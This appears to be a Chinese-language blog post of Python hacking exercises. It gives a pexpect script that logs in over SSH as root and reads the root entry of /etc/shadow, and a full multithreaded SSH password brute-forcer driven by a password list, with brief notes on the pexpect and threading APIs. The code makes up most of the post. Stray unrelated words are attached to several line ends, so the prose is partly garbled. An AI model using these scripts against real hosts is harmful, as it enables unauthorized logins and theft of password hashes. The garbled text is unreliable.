這裏centos系統python
# -*- coding: utf-8 -*- # @Author : Lan126 import pexpect PROMPT = ["# ", ">>> ", "> ", "\$ "] def connect(user, host, password): ssh_newkey = "Are you sure you want to continue connecting" connStr = "ssh " + user + "@" + host child = pexpect.spawn(connStr) ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[p|P]assword:"]) if ret == 0: print("[-] Error Connecting") return if ret == 1: child.sendline("yes") ret = child.expect([pexpect.TIMEOUT, "[p|P]assword:"]) if ret == 0: print("[-] Error Connecting") return child.sendline(password) child.expect(PROMPT) return child def send_command(child, cmd): child.sendline(cmd) child.expect(PROMPT) print((child.before).encode("utf-8")) def main(): host = "localhost" user = "root" password = "*************************" child = connect(user, host, password) send_command(child, "cat /etc/shadow | grep root") if __name__ == "__main__": main()
下面是從Pexpect文檔中複製的一句話基本上能夠歸納這一個腳本的全部知識點了express
There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected patterncentos
spawnclass的做用以下app
This is the main class interface for Pexpect. Use this class to start and control child applications.ssh
這裏也是centos系統xss
# -*- coding: utf-8 -*- # @Author : Lan126 import optparse from pexpect import pxssh import time from threading import * maxConnections = 5 connection_lock = BoundedSemaphore(value=maxConnections) Found = False Fails = 0 def connect(host, user, password, release): global Found global Fails try: s = pxssh.pxssh() s.login(host, user, password) print("[+] Password Found " + password) Found = True except Exception as e: if "read_nonblocking" in str(e): Fails += 1 time.sleep(5) connect(host, user, password, False) elif "synchronize with original prompt" in str(e): time.sleep(1) connect(host, user, password, False) finally: if release: connection_lock.release() def main(): parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>") parser.add_option("-H", dest="tgtHost", type="string", help="specify target host") parser.add_option("-u", dest="user", type="string", help="specify the user") parser.add_option("-F", dest="passwordFile", type="string", help="specify password file") options, args = parser.parse_args() host = options.tgtHost passwdFile = options.passwordFile user = options.user if host is None or passwdFile is None or user is None: print(parser.usage) exit(0) fn = open(passwdFile, "r") for line in fn.readlines(): if Found: # 若是發現了密碼就退出 print("[*] Exiting: Password Found") exit(0) if Fails > 5: print("[!] Too Many Socket Timeouts") exit(0) connection_lock.acquire() password = line.strip("\r").strip("\n") print("[-] Testing: " + str(password)) t = Thread(target=connect, args=(host, user, password, True)) t.start() if __name__ == "__main__": main()
這其實也是上面那個腳本的更高級的封裝不過就是加了一個讀取密碼文件的過程而已
這一個腳本的知識點有全局變量,信號量,以及pxssh模塊的使用,它能夠直接用login()等函數與ssh交互
BoundedSemaphore類瞭解一下函數
A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.ui